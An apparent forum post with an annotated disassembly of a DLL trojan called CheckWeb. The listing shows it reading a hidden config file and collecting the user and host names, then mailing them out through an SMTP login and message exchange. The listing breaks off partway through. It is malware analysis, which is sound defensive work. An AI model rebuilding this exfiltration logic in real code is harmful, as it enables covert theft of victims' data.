发一dll木马的分析
100013E0 /$ 83EC 10 SUB ESP,10
100013E3 |. 8D4424 00 LEA EAX,DWORD PTR SS:[ESP]
100013E7 |. 8D4C24 04 LEA ECX,DWORD PTR SS:[ESP+4]
100013EB |. 50 PUSH EAX ; /pThreadId
100013EC |. 6A 00 PUSH 0 ; |CreationFlags = 0
100013EE |. 6A 00 PUSH 0 ; |pThreadParm = NULL
100013F0 |. 68 20140010 PUSH CheckWeb.10001420 ; |ThreadFunction = CheckWeb.10001420
100013F5 |. 6A 00 PUSH 0 ; |StackSize = 0
100013F7 |. 51 PUSH ECX ; |pSecurity
100013F8 |. C74424 24 010>MOV DWORD PTR SS:[ESP+24],1 ; |
10001400 |. C74424 20 000>MOV DWORD PTR SS:[ESP+20],0 ; |
10001408 |. C74424 1C 0C0>MOV DWORD PTR SS:[ESP+1C],0C ; |
10001410 |. FF15 30800010 CALL DWORD PTR DS:[<&KERNEL32.CreateThre>; \CreateThread
10001416 |. 83C4 10 ADD ESP,10
10001419 \. C3 RETN
开一个线程,回调函数10001420
10001420 . 56 PUSH ESI
10001421 . 57 PUSH EDI
10001422 . B9 0C000000 MOV ECX,0C
10001427 . 33C0 XOR EAX,EAX
10001429 . BF D0710110 MOV EDI,CheckWeb.100171D0
1000142E . F3:AB REP STOS DWORD PTR ES:[EDI]
10001430 . 66:AB STOS WORD PTR ES:[EDI]
10001432 . B9 0C000000 MOV ECX,0C
10001437 . 33C0 XOR EAX,EAX
10001439 . BF 04720110 MOV EDI,CheckWeb.10017204
1000143E . F3:AB REP STOS DWORD PTR ES:[EDI]
10001440 . 66:AB STOS WORD PTR ES:[EDI]
10001442 . B9 0C000000 MOV ECX,0C
10001447 . 33C0 XOR EAX,EAX
10001449 . BF 38720110 MOV EDI,CheckWeb.10017238
1000144E . F3:AB REP STOS DWORD PTR ES:[EDI]
10001450 . 66:AB STOS WORD PTR ES:[EDI]
10001452 . B9 0C000000 MOV ECX,0C
10001457 . 33C0 XOR EAX,EAX
10001459 . BF 6C720110 MOV EDI,CheckWeb.1001726C
1000145E . F3:AB REP STOS DWORD PTR ES:[EDI]
10001460 . 66:AB STOS WORD PTR ES:[EDI]
10001462 . B9 0C000000 MOV ECX,0C
10001467 . 33C0 XOR EAX,EAX
10001469 . BF A0720110 MOV EDI,CheckWeb.100172A0
1000146E . F3:AB REP STOS DWORD PTR ES:[EDI]
10001470 . 66:AB STOS WORD PTR ES:[EDI] ;初始化
10001472 . E8 F90A0000 CALL CheckWeb.10001F70
10001477 . 68 D0710110 PUSH CheckWeb.100171D0
1000147C . 68 D0710110 PUSH CheckWeb.100171D0
10001481 . E8 AA0E0000 CALL CheckWeb.10002330
10001486 . 68 04720110 PUSH CheckWeb.10017204
1000148B . 68 04720110 PUSH CheckWeb.10017204
10001490 . E8 9B0E0000 CALL CheckWeb.10002330
10001495 . 68 38720110 PUSH CheckWeb.10017238
1000149A . 68 38720110 PUSH CheckWeb.10017238
1000149F . E8 8C0E0000 CALL CheckWeb.10002330
100014A4 . 68 6C720110 PUSH CheckWeb.1001726C
100014A9 . 68 6C720110 PUSH CheckWeb.1001726C
100014AE . E8 7D0E0000 CALL CheckWeb.10002330
100014B3 . 68 A0720110 PUSH CheckWeb.100172A0
100014B8 . 68 A0720110 PUSH CheckWeb.100172A0
100014BD . E8 6E0E0000 CALL CheckWeb.10002330
100014C2 . 8B35 2C800010 MOV ESI,DWORD PTR DS:[<&KERNEL32.Sleep>] ; kernel32.Sleep
100014C8 . 83C4 28 ADD ESP,28
100014CB . 68 C0D40100 PUSH 1D4C0
100014D0 > FFD6 CALL ESI ;调用sleep休息两分钟
100014D2 . E8 09000000 CALL CheckWeb.100014E0
100014D7 . 68 80EE3600 PUSH 36EE80
100014DC .^ EB F2 JMP SHORT CheckWeb.100014D0
函数10001F70的内容
10001F70 /$ 81EC 04030000 SUB ESP,304
10001F76 |. 8D8424 000200>LEA EAX,DWORD PTR SS:[ESP+200]
10001F7D |. 53 PUSH EBX
10001F7E |. 56 PUSH ESI
10001F7F |. 57 PUSH EDI
10001F80 |. 68 04010000 PUSH 104 ; /BufSize = 104 (260.)
10001F85 |. 50 PUSH EAX ; |Buffer
10001F86 |. FF15 20800010 CALL DWORD PTR DS:[<&KERNEL32.GetSystemD>; \GetSystemDirectoryA
10001F8C |. 8D8C24 0C0200>LEA ECX,DWORD PTR SS:[ESP+20C] ;得到系统目录
10001F93 |. 68 3C910010 PUSH CheckWeb.1000913C ; /StringToAdd = "\driver32.dll"
10001F98 |. 51 PUSH ECX ; |ConcatString
10001F99 |. FF15 24800010 CALL DWORD PTR DS:[<&KERNEL32.lstrcatA>] ; \lstrcatA
10001F9F |. 8BD0 MOV EDX,EAX edx = C:\WINDOWS\system32\driver32.dll
10001FA1 |. B9 80000000 MOV ECX,80
10001FA6 |. 33C0 XOR EAX,EAX
10001FA8 |. 8D7C24 0C LEA EDI,DWORD PTR SS:[ESP+C]
10001FAC |. 68 38910010 PUSH CheckWeb.10009138 ; r
10001FB1 |. 52 PUSH EDX ; Filename
10001FB2 |. F3:AB REP STOS DWORD PTR ES:[EDI]
10001FB4 |. E8 360B0000 CALL CheckWeb.10002AEF ; _fopen
10001FB9 |. 8BD8 MOV EBX,EAX
10001FBB |. 83C4 08 ADD ESP,8 ;测试ebx
10001FBE |. 85DB TEST EBX,EBX ;不相等 不等0则跳
10001FC0 |. 75 0C JNZ SHORT CheckWeb.10001FCE
10001FC2 |> 5F POP EDI
10001FC3 |. 5E POP ESI
10001FC4 |. 32C0 XOR AL,AL
10001FC6 |. 5B POP EBX
10001FC7 |. 81C4 04030000 ADD ESP,304
10001FCD |. C3 RETN
CheckWeb.100014E0
100014D2 . E8 09000000 CALL CheckWeb.100014E0
100014D7 . 68 80EE3600 PUSH 36EE80
100014DC .^ EB F2 JMP SHORT CheckWeb.100014D0
100014DE 90 NOP
100014DF 90 NOP
100014E0 /$ 81EC 5C070000 SUB ESP,75C
100014E6 |. 53 PUSH EBX
100014E7 |. 8D8424 D00500>LEA EAX,DWORD PTR SS:[ESP+5D0]
100014EE |. 56 PUSH ESI
100014EF |. 50 PUSH EAX ; /pWSAData
100014F0 |. 68 01010000 PUSH 101 ; |RequestedVersion = 101 (1.1.)
100014F5 |. C74424 10 400>MOV DWORD PTR SS:[ESP+10],40 ; |
100014FD |. 33F6 XOR ESI,ESI ; |
100014FF |. C605 18AE0010>MOV BYTE PTR DS:[1000AE18],0 ; |
10001506 |. E8 B90E0000 CALL <JMP.&WSOCK32.#115> ; \WSAStartup
1000150B |. 85C0 TEST EAX,EAX
1000150D |. 74 0B JE SHORT CheckWeb.1000151A
1000150F |. 5E POP ESI
10001510 |. 33C0 XOR EAX,EAX
10001512 |. 5B POP EBX
10001513 |. 81C4 5C070000 ADD ESP,75C
10001519 |. C3 RETN
1000151A |> 68 18AE0010 PUSH CheckWeb.1000AE18
1000151F |. E8 DC070000 CALL CheckWeb.10001D00
10001524 |. 83C4 04 ADD ESP,4
10001527 |. 6A 00 PUSH 0 ; /Protocol = IPPROTO_IP
10001529 |. 6A 01 PUSH 1 ; |Type = SOCK_STREAM
1000152B |. 6A 02 PUSH 2 ; |Family = AF_INET
1000152D |. E8 8C0E0000 CALL <JMP.&WSOCK32.#23> ; \socket
10001532 |. 8BD8 MOV EBX,EAX
10001534 |. 83FB FF CMP EBX,-1
10001537 |. 75 0B JNZ SHORT CheckWeb.10001544
10001539 |. 5E POP ESI
1000153A |. 33C0 XOR EAX,EAX
1000153C |. 5B POP EBX
1000153D |. 81C4 5C070000 ADD ESP,75C
10001543 |. C3 RETN
10001544 |> 0FBE0D D07101>MOVSX ECX,BYTE PTR DS:[100171D0]
1000154B |. 57 PUSH EDI
1000154C |. 51 PUSH ECX
1000154D |. E8 EA110000 CALL CheckWeb.1000273C
10001552 |. 83C4 04 ADD ESP,4
10001555 |. 85C0 TEST EAX,EAX
10001557 |. 74 1E JE SHORT CheckWeb.10001577
10001559 |. 6A 2E PUSH 2E
1000155B |. 68 D0710110 PUSH CheckWeb.100171D0
10001560 |. E8 1B110000 CALL CheckWeb.10002680
10001565 |. 83C4 08 ADD ESP,8
10001568 |. 85C0 TEST EAX,EAX
1000156A |. 74 0B JE SHORT CheckWeb.10001577
1000156C |. 8B7C24 0C MOV EDI,DWORD PTR SS:[ESP+C]
10001570 |. BE 01000000 MOV ESI,1
10001575 |. EB 0C JMP SHORT CheckWeb.10001583
10001577 |> 68 D0710110 PUSH CheckWeb.100171D0 ; /Name = ""
1000157C |. E8 370E0000 CALL <JMP.&WSOCK32.#52> ; \gethostbyname
10001581 |. 8BF8 MOV EDI,EAX
10001583 |> 85FF TEST EDI,EDI
10001585 |. 0F84 58070000 JE CheckWeb.10001CE3
1000158B |. 6A 19 PUSH 19 ; /NetShort = 19
1000158D |. 66:C74424 14 >MOV WORD PTR SS:[ESP+14],2 ; |
10001594 |. E8 190E0000 CALL <JMP.&WSOCK32.#9> ; \ntohs
10001599 |. 85F6 TEST ESI,ESI
1000159B |. 66:894424 12 MOV WORD PTR SS:[ESP+12],AX
100015A0 |. 74 10 JE SHORT CheckWeb.100015B2
100015A2 |. 68 D0710110 PUSH CheckWeb.100171D0 ; /pAddr = CheckWeb.100171D0
100015A7 |. E8 000E0000 CALL <JMP.&WSOCK32.#10> ; \inet_addr
100015AC |. 894424 14 MOV DWORD PTR SS:[ESP+14],EAX
100015B0 |. EB 0B JMP SHORT CheckWeb.100015BD
100015B2 |> 8B57 0C MOV EDX,DWORD PTR DS:[EDI+C]
100015B5 |. 8B02 MOV EAX,DWORD PTR DS:[EDX]
100015B7 |. 8B08 MOV ECX,DWORD PTR DS:[EAX]
100015B9 |. 894C24 14 MOV DWORD PTR SS:[ESP+14],ECX
100015BD |> 8D5424 0C LEA EDX,DWORD PTR SS:[ESP+C]
100015C1 |. 8D4424 64 LEA EAX,DWORD PTR SS:[ESP+64]
100015C5 |. 52 PUSH EDX ; /pBufCount
100015C6 |. 50 PUSH EAX ; |Buffer
100015C7 |. FF15 04800010 CALL DWORD PTR DS:[<&ADVAPI32.GetUserNam>; \GetUserNameA
100015CD |. 8D4C24 20 LEA ECX,DWORD PTR SS:[ESP+20]
100015D1 |. 6A 40 PUSH 40 ; /BufSize = 40 (64.)
100015D3 |. 51 PUSH ECX ; |Buffer
100015D4 |. C74424 14 400>MOV DWORD PTR SS:[ESP+14],40 ; |
100015DC |. E8 C50D0000 CALL <JMP.&WSOCK32.#57> ; \gethostname
100015E1 |. 8D5424 10 LEA EDX,DWORD PTR SS:[ESP+10]
100015E5 |. 6A 10 PUSH 10 ; /AddrLen = 10 (16.)
100015E7 |. 52 PUSH EDX ; |pSockAddr
100015E8 |. 53 PUSH EBX ; |Socket
100015E9 |. E8 B20D0000 CALL <JMP.&WSOCK32.#4> ; \connect
100015EE |. 85C0 TEST EAX,EAX
100015F0 |. 0F85 ED060000 JNZ CheckWeb.10001CE3
100015F6 |. 50 PUSH EAX ; /Flags
100015F7 |. 8D8424 D80100>LEA EAX,DWORD PTR SS:[ESP+1D8] ; |
100015FE |. 68 00040000 PUSH 400 ; |BufSize = 400 (1024.)
10001603 |. 50 PUSH EAX ; |Buffer
10001604 |. 53 PUSH EBX ; |Socket
10001605 |. E8 900D0000 CALL <JMP.&WSOCK32.#16> ; \recv
1000160A |. 85C0 TEST EAX,EAX
1000160C |. 0F8E D1060000 JLE CheckWeb.10001CE3
10001612 |. 8D8C24 D40100>LEA ECX,DWORD PTR SS:[ESP+1D4]
10001619 |. 68 20910010 PUSH CheckWeb.10009120 ; ASCII "220"
1000161E |. 51 PUSH ECX
1000161F |. E8 CC0F0000 CALL CheckWeb.100025F0
10001624 |. 83C4 08 ADD ESP,8
10001627 |. 85C0 TEST EAX,EAX
10001629 |. 0F84 B4060000 JE CheckWeb.10001CE3
1000162F |. 6A 00 PUSH 0 ; /Flags = 0
10001631 |. 6A 05 PUSH 5 ; |DataSize = 5
10001633 |. 68 18910010 PUSH CheckWeb.10009118 ; |Data = CheckWeb.10009118
10001638 |. 53 PUSH EBX ; |Socket
10001639 |. E8 560D0000 CALL <JMP.&WSOCK32.#19> ; \send
1000163E |. 85C0 TEST EAX,EAX
10001640 |. 0F8E 9D060000 JLE CheckWeb.10001CE3
10001646 |. 8D7C24 20 LEA EDI,DWORD PTR SS:[ESP+20]
1000164A |. 83C9 FF OR ECX,FFFFFFFF
1000164D |. 33C0 XOR EAX,EAX
1000164F |. 6A 00 PUSH 0 ; /Flags = 0
10001651 |. F2:AE REPNE SCAS BYTE PTR ES:[EDI] ; |
10001653 |. F7D1 NOT ECX ; |
10001655 |. 49 DEC ECX ; |
10001656 |. 8D5424 24 LEA EDX,DWORD PTR SS:[ESP+24] ; |
1000165A |. 51 PUSH ECX ; |DataSize
1000165B |. 52 PUSH EDX ; |Data
1000165C |. 53 PUSH EBX ; |Socket
1000165D |. E8 320D0000 CALL <JMP.&WSOCK32.#19> ; \send
10001662 |. 85C0 TEST EAX,EAX
10001664 |. 0F8E 79060000 JLE CheckWeb.10001CE3
1000166A |. 6A 00 PUSH 0 ; /Flags = 0
1000166C |. 6A 02 PUSH 2 ; |DataSize = 2
1000166E |. 68 14910010 PUSH CheckWeb.10009114 ; |Data = CheckWeb.10009114
10001673 |. 53 PUSH EBX ; |Socket
10001674 |. E8 1B0D0000 CALL <JMP.&WSOCK32.#19> ; \send
10001679 |. 85C0 TEST EAX,EAX
1000167B |. 0F8E 62060000 JLE CheckWeb.10001CE3
10001681 |. 6A 00 PUSH 0 ; /Flags = 0
10001683 |. 8D8424 D80100>LEA EAX,DWORD PTR SS:[ESP+1D8] ; |
1000168A |. 68 00040000 PUSH 400 ; |BufSize = 400 (1024.)
1000168F |. 50 PUSH EAX ; |Buffer
10001690 |. 53 PUSH EBX ; |Socket
10001691 |. E8 040D0000 CALL <JMP.&WSOCK32.#16> ; \recv
10001696 |. 85C0 TEST EAX,EAX
10001698 |. 0F8E 45060000 JLE CheckWeb.10001CE3
1000169E |. 8D8C24 D40100>LEA ECX,DWORD PTR SS:[ESP+1D4]
100016A5 |. 68 10910010 PUSH CheckWeb.10009110 ; ASCII "250"
100016AA |. 51 PUSH ECX
100016AB |. E8 400F0000 CALL CheckWeb.100025F0
100016B0 |. 83C4 08 ADD ESP,8
100016B3 |. 85C0 TEST EAX,EAX
100016B5 |. 0F84 28060000 JE CheckWeb.10001CE3
100016BB |. 6A 00 PUSH 0 ; /Flags = 0
100016BD |. 6A 0A PUSH 0A ; |DataSize = A (10.)
100016BF |. 68 04910010 PUSH CheckWeb.10009104 ; |Data = CheckWeb.10009104
100016C4 |. 53 PUSH EBX ; |Socket
100016C5 |. E8 CA0C0000 CALL <JMP.&WSOCK32.#19> ; \send
100016CA |. 85C0 TEST EAX,EAX
100016CC |. 0F8E 11060000 JLE CheckWeb.10001CE3
100016D2 |. 6A 00 PUSH 0 ; /Flags = 0
100016D4 |. 6A 02 PUSH 2 ; |DataSize = 2
100016D6 |. 68 14910010 PUSH CheckWeb.10009114 ; |Data = CheckWeb.10009114
100016DB |. 53 PUSH EBX ; |Socket
100016DC |. E8 B30C0000 CALL <JMP.&WSOCK32.#19> ; \send
100016E1 |. 85C0 TEST EAX,EAX
100016E3 |. 0F8E FA050000 JLE CheckWeb.10001CE3
100016E9 |. 6A 00 PUSH 0 ; /Flags = 0
100016EB |. 8D9424 D80100>LEA EDX,DWORD PTR SS:[ESP+1D8] ; |
100016F2 |. 68 00040000 PUSH 400 ; |BufSize = 400 (1024.)
100016F7 |. 52 PUSH EDX ; |Buffer
100016F8 |. 53 PUSH EBX ; |Socket
100016F9 |. E8 9C0C0000 CALL <JMP.&WSOCK32.#16> ; \recv
100016FE |. 85C0 TEST EAX,EAX
10001700 |. 0F8E DD050000 JLE CheckWeb.10001CE3
10001706 |. 8D8424 D40100>LEA EAX,DWORD PTR SS:[ESP+1D4]
1000170D |. 68 00910010 PUSH CheckWeb.10009100 ; ASCII "334"
10001712 |. 50 PUSH EAX
10001713 |. E8 D80E0000 CALL CheckWeb.100025F0
10001718 |. 83C4 08 ADD ESP,8
1000171B |. 85C0 TEST EAX,EAX
1000171D |. 0F84 EC000000 JE CheckWeb.1000180F
10001723 |. BF 6C720110 MOV EDI,CheckWeb.1001726C
10001728 |. 83C9 FF OR ECX,FFFFFFFF
1000172B |. 33C0 XOR EAX,EAX
1000172D |. 6A 00 PUSH 0 ; /Flags = 0
1000172F |. F2:AE REPNE SCAS BYTE PTR ES:[EDI] ; |
10001731 |. F7D1 NOT ECX ; |
10001733 |. 49 DEC ECX ; |
10001734 |. 51 PUSH ECX ; |DataSize
10001735 |. 68 6C720110 PUSH CheckWeb.1001726C ; |Data = CheckWeb.1001726C
1000173A |. 53 PUSH EBX ; |Socket
1000173B |. E8 540C0000 CALL <JMP.&WSOCK32.#19> ; \send
10001740 |. 85C0 TEST EAX,EAX
10001742 |. 0F8E 9B050000 JLE CheckWeb.10001CE3
10001748 |. 6A 00 PUSH 0 ; /Flags = 0
1000174A |. 6A 02 PUSH 2 ; |DataSize = 2
1000174C |. 68 14910010 PUSH CheckWeb.10009114 ; |Data = CheckWeb.10009114
10001751 |. 53 PUSH EBX ; |Socket
10001752 |. E8 3D0C0000 CALL <JMP.&WSOCK32.#19> ; \send
10001757 |. 85C0 TEST EAX,EAX
10001759 |. 0F8E 84050000 JLE CheckWeb.10001CE3
1000175F |. 6A 00 PUSH 0 ; /Flags = 0
10001761 |. 8D8C24 D80100>LEA ECX,DWORD PTR SS:[ESP+1D8] ; |
10001768 |. 68 00040000 PUSH 400 ; |BufSize = 400 (1024.)
1000176D |. 51 PUSH ECX ; |Buffer
1000176E |. 53 PUSH EBX ; |Socket
1000176F |. E8 260C0000 CALL <JMP.&WSOCK32.#16> ; \recv
10001774 |. 85C0 TEST EAX,EAX
10001776 |. 0F8E 67050000 JLE CheckWeb.10001CE3
1000177C |. 8D9424 D40100>LEA EDX,DWORD PTR SS:[ESP+1D4]
10001783 |. 68 00910010 PUSH CheckWeb.10009100 ; ASCII "334"
10001788 |. 52 PUSH EDX
10001789 |. E8 620E0000 CALL CheckWeb.100025F0
1000178E |. 83C4 08 ADD ESP,8
10001791 |. 85C0 TEST EAX,EAX
10001793 |. 0F84 4A050000 JE CheckWeb.10001CE3
10001799 |. BF 38720110 MOV EDI,CheckWeb.10017238
1000179E |. 83C9 FF OR ECX,FFFFFFFF
100017A1 |. 33C0 XOR EAX,EAX
100017A3 |. 6A 00 PUSH 0 ; /Flags = 0
100017A5 |. F2:AE REPNE SCAS BYTE PTR ES:[EDI] ; |
100017A7 |. F7D1 NOT ECX ; |
100017A9 |. 49 DEC ECX ; |
100017AA |. 51 PUSH ECX ; |DataSize
100017AB |. 68 38720110 PUSH CheckWeb.10017238 ; |Data = CheckWeb.10017238
100017B0 |. 53 PUSH EBX ; |Socket
100017B1 |. E8 DE0B0000 CALL <JMP.&WSOCK32.#19> ; \send
100017B6 |. 85C0 TEST EAX,EAX
100017B8 |. 0F8E 25050000 JLE CheckWeb.10001CE3
100017BE |. 6A 00 PUSH 0 ; /Flags = 0
100017C0 |. 6A 02 PUSH 2 ; |DataSize = 2
100017C2 |. 68 14910010 PUSH CheckWeb.10009114 ; |Data = CheckWeb.10009114
100017C7 |. 53 PUSH EBX ; |Socket
100017C8 |. E8 C70B0000 CALL <JMP.&WSOCK32.#19> ; \send
100017CD |. 85C0 TEST EAX,EAX
100017CF |. 0F8E 0E050000 JLE CheckWeb.10001CE3
100017D5 |. 6A 00 PUSH 0 ; /Flags = 0
100017D7 |. 8D8424 D80100>LEA EAX,DWORD PTR SS:[ESP+1D8] ; |
100017DE |. 68 00040000 PUSH 400 ; |BufSize = 400 (1024.)
100017E3 |. 50 PUSH EAX ; |Buffer
100017E4 |. 53 PUSH EBX ; |Socket
100017E5 |. E8 B00B0000 CALL <JMP.&WSOCK32.#16> ; \recv
100017EA |. 85C0 TEST EAX,EAX
100017EC |. 0F8E F1040000 JLE CheckWeb.10001CE3
100017F2 |. 8D8C24 D40100>LEA ECX,DWORD PTR SS:[ESP+1D4]
100017F9 |. 68 FC900010 PUSH CheckWeb.100090FC ; ASCII "235"
100017FE |. 51 PUSH ECX
100017FF |. E8 EC0D0000 CALL CheckWeb.100025F0
10001804 |. 83C4 08 ADD ESP,8
10001807 |. 85C0 TEST EAX,EAX
10001809 |. 0F84 D4040000 JE CheckWeb.10001CE3
1000180F |> 6A 00 PUSH 0 ; /Flags = 0
10001811 |. 6A 0A PUSH 0A ; |DataSize = A (10.)
10001813 |. 68 F0900010 PUSH CheckWeb.100090F0 ; |Data = CheckWeb.100090F0
10001818 |. 53 PUSH EBX ; |Socket
10001819 |. E8 760B0000 CALL <JMP.&WSOCK32.#19> ; \send
1000181E |. 85C0 TEST EAX,EAX
10001820 |. 0F8E BD040000 JLE CheckWeb.10001CE3
10001826 |. B9 19000000 MOV ECX,19
1000182B |. 33C0 XOR EAX,EAX
1000182D |. 8DBC24 A80000>LEA EDI,DWORD PTR SS:[ESP+A8]
10001834 |. 68 A0720110 PUSH CheckWeb.100172A0
10001839 |. 8D9424 AC0000>LEA EDX,DWORD PTR SS:[ESP+AC]
10001840 |. 68 E8900010 PUSH CheckWeb.100090E8 ; ASCII " <%s>"
10001845 |. F3:AB REP STOS DWORD PTR ES:[EDI]
10001847 |. 52 PUSH EDX
10001848 |. E8 4B0D0000 CALL CheckWeb.10002598
1000184D |. 8DBC24 B40000>LEA EDI,DWORD PTR SS:[ESP+B4]
10001854 |. 83C9 FF OR ECX,FFFFFFFF
10001857 |. 33C0 XOR EAX,EAX
10001859 |. 83C4 0C ADD ESP,0C
1000185C |. F2:AE REPNE SCAS BYTE PTR ES:[EDI]
1000185E |. F7D1 NOT ECX
10001860 |. 49 DEC ECX
10001861 |. 6A 00 PUSH 0 ; /Flags = 0
10001863 |. 8D8424 AC0000>LEA EAX,DWORD PTR SS:[ESP+AC] ; |
1000186A |. 51 PUSH ECX ; |DataSize
1000186B |. 50 PUSH EAX ; |Data
1000186C |. 53 PUSH EBX ; |Socket
1000186D |. E8 220B0000 CALL <JMP.&WSOCK32.#19> ; \send
10001872 |. 85C0 TEST EAX,EAX
10001874 |. 0F8E 69040000 JLE CheckWeb.10001CE3
1000187A |. 6A 00 PUSH 0 ; /Flags = 0
1000187C |. 6A 02 PUSH 2 ; |DataSize = 2
1000187E |. 68 14910010 PUSH CheckWeb.10009114 ; |Data = CheckWeb.10009114
10001883 |. 53 PUSH EBX ; |Socket
10001884 |. E8 0B0B0000 CALL <JMP.&WSOCK32.#19> ; \send
10001889 |. 85C0 TEST EAX,EAX
1000188B |. 0F8E 52040000 JLE CheckWeb.10001CE3
10001891 |. 6A 00 PUSH 0 ; /Flags = 0
10001893 |. 8D8C24 D80100>LEA ECX,DWORD PTR SS:[ESP+1D8] ; |
1000189A |. 68 00040000 PUSH 400 ; |BufSize = 400 (1024.)
1000189F |. 51 PUSH ECX ; |Buffer
100018A0 |. 53 PUSH EBX ; |Socket
100018A1 |. E8 F40A0000 CALL <JMP.&WSOCK32.#16> ; \recv
100018A6 |. 85C0 TEST EAX,EAX
100018A8 |. 0F8E 35040000 JLE CheckWeb.10001CE3
100018AE |. 8D9424 D40100>LEA EDX,DWORD PTR SS:[ESP+1D4]
100018B5 |. 68 10910010 PUSH CheckWeb.10009110 ; ASCII "250"
100018BA |. 52 PUSH EDX
100018BB |. E8 300D0000 CALL CheckWeb.100025F0
100018C0 |. 83C4 08 ADD ESP,8
100018C3 |. 85C0 TEST EAX,EAX
100018C5 |. 0F84 18040000 JE CheckWeb.10001CE3
100018CB |. 6A 00 PUSH 0 ; /Flags = 0
100018CD |. 6A 08 PUSH 8 ; |DataSize = 8
100018CF |. 68 DC900010 PUSH CheckWeb.100090DC ; |Data = CheckWeb.100090DC
100018D4 |. 53 PUSH EBX ; |Socket
100018D5 |. E8 BA0A0000 CALL <JMP.&WSOCK32.#19> ; \send
100018DA |. 85C0 TEST EAX,EAX
100018DC |. 0F8E 01040000 JLE CheckWeb.10001CE3
100018E2 |. B9 19000000 MOV ECX,19
100018E7 |. 33C0 XOR EAX,EAX
100018E9 |. 8DBC24 700100>LEA EDI,DWORD PTR SS:[ESP+170]
100018F0 |. 68 04720110 PUSH CheckWeb.10017204
100018F5 |. F3:AB REP STOS DWORD PTR ES:[EDI]
100018F7 |. 8D8424 740100>LEA EAX,DWORD PTR SS:[ESP+174]
100018FE |. 68 E8900010 PUSH CheckWeb.100090E8 ; ASCII " <%s>"
10001903 |. 50 PUSH EAX
10001904 |. E8 8F0C0000 CALL CheckWeb.10002598
10001909 |. 8DBC24 7C0100>LEA EDI,DWORD PTR SS:[ESP+17C]
10001910 |. 83C9 FF OR ECX,FFFFFFFF
10001913 |. 33C0 XOR EAX,EAX
10001915 |. 83C4 0C ADD ESP,0C
10001918 |. F2:AE REPNE SCAS BYTE PTR ES:[EDI]
1000191A |. F7D1 NOT ECX
1000191C |. 49 DEC ECX
1000191D |. 6A 00 PUSH 0 ; /Flags = 0
1000191F |. 51 PUSH ECX ; |DataSize
10001920 |. 8D8C24 780100>LEA ECX,DWORD PTR SS:[ESP+178] ; |
10001927 |. 51 PUSH ECX ; |Data
10001928 |. 53 PUSH EBX ; |Socket
10001929 |. E8 660A0000 CALL <JMP.&WSOCK32.#19> ; \send
1000192E |. 85C0 TEST EAX,EAX
10001930 |. 0F8E AD030000 JLE CheckWeb.10001CE3
10001936 |. 6A 00 PUSH 0 ; /Flags = 0
10001938 |. 6A 02 PUSH 2 ; |DataSize = 2
1000193A |. 68 14910010 PUSH CheckWeb.10009114 ; |Data = CheckWeb.10009114
1000193F |. 53 PUSH EBX ; |Socket
10001940 |. E8 4F0A0000 CALL <JMP.&WSOCK32.#19> ; \send
10001945 |. 85C0 TEST EAX,EAX
10001947 |. 0F8E 96030000 JLE CheckWeb.10001CE3
1000194D |. 6A 00 PUSH 0 ; /Flags = 0
1000194F |. 8D9424 D80100>LEA EDX,DWORD PTR SS:[ESP+1D8] ; |
10001956 |. 68 00040000 PUSH 400 ; |BufSize = 400 (1024.)
1000195B |. 52 PUSH EDX ; |Buffer
1000195C |. 53 PUSH EBX ; |Socket
1000195D |. E8 380A0000 CALL <JMP.&WSOCK32.#16> ; \recv
10001962 |. 85C0 TEST EAX,EAX
10001964 |. 0F8E 79030000 JLE CheckWeb.10001CE3
1000196A |. 8D8424 D40100>LEA EAX,DWORD PTR SS:[ESP+1D4]
10001971 |. 68 10910010 PUSH CheckWeb.10009110 ; ASCII "250"
10001976 |. 50 PUSH EAX
10001977 |. E8 740C0000 CALL CheckWeb.100025F0
1000197C |. 83C4 08 ADD ESP,8
1000197F |. 85C0 TEST EAX,EAX
10001981 |. 0F84 5C030000 JE CheckWeb.10001CE3
10001987 |. 6A 00 PUSH 0 ; /Flags = 0
10001989 |. 6A 06 PUSH 6 ; |DataSize = 6
1000198B |. 68 D4900010 PUSH CheckWeb.100090D4 ; |Data = CheckWeb.100090D4
10001990 |. 53 PUSH EBX ; |Socket
10001991 |. E8 FE090000 CALL <JMP.&WSOCK32.#19> ; \send
10001996 |. 85C0 TEST EAX,EAX
10001998 |. 0F8E 45030000 JLE CheckWeb.10001CE3
1000199E |. 6A 00 PUSH 0 ; /Flags = 0
100019A0 |. 8D8C24 D80100>LEA ECX,DWORD PTR SS:[ESP+1D8] ; |
100019A7 |. 68 00040000 PUSH 400 ; |BufSize = 400 (1024.)
100019AC |. 51 PUSH ECX ; |Buffer
100019AD |. 53 PUSH EBX ; |Socket
100019AE |. E8 E7090000 CALL <JMP.&WSOCK32.#16> ; \recv
100019B3 |. 85C0 TEST EAX,EAX
100019B5 |. 0F8E 28030000 JLE CheckWeb.10001CE3
100019BB |. 8D9424 D40100>LEA EDX,DWORD PTR SS:[ESP+1D4]
100019C2 |. 68 D0900010 PUSH CheckWeb.100090D0 ; ASCII "354"
100019C7 |. 52 PUSH EDX
100019C8 |. E8 230C0000 CALL CheckWeb.100025F0
100019CD |. 83C4 08 ADD ESP,8
100019D0 |. 85C0 TEST EAX,EAX
100019D2 |. 0F84 0B030000 JE CheckWeb.10001CE3
100019D8 |. BF C8900010 MOV EDI,CheckWeb.100090C8 ; ASCII "From: "
100019DD |. 83C9 FF OR ECX,FFFFFFFF
100019E0 |. 33C0 XOR EAX,EAX
100019E2 |. 6A 00 PUSH 0 ; /Flags = 0
100019E4 |. F2:AE REPNE SCAS BYTE PTR ES:[EDI] ; |
100019E6 |. F7D1 NOT ECX ; |
100019E8 |. 49 DEC ECX ; |
100019E9 |. 51 PUSH ECX ; |DataSize
100019EA |. 68 C8900010 PUSH CheckWeb.100090C8 ; |Data = CheckWeb.100090C8
100019EF |. 53 PUSH EBX ; |Socket
100019F0 |. E8 9F090000 CALL <JMP.&WSOCK32.#19> ; \send
100019F5 |. 85C0 TEST EAX,EAX
100019F7 |. 0F8E E6020000 JLE CheckWeb.10001CE3
100019FD |. BF A0720110 MOV EDI,CheckWeb.100172A0
10001A02 |. 83C9 FF OR ECX,FFFFFFFF
10001A05 |. 33C0 XOR EAX,EAX
10001A07 |. 6A 00 PUSH 0 ; /Flags = 0
10001A09 |. F2:AE REPNE SCAS BYTE PTR ES:[EDI] ; |
10001A0B |. F7D1 NOT ECX ; |
10001A0D |. 49 DEC ECX ; |
10001A0E |. 51 PUSH ECX ; |DataSize
10001A0F |. 68 A0720110 PUSH CheckWeb.100172A0 ; |Data = CheckWeb.100172A0
10001A14 |. 53 PUSH EBX ; |Socket
10001A15 |. E8 7A090000 CALL <JMP.&WSOCK32.#19> ; \send
10001A1A |. 85C0 TEST EAX,EAX
10001A1C |. 0F8E C1020000 JLE CheckWeb.10001CE3
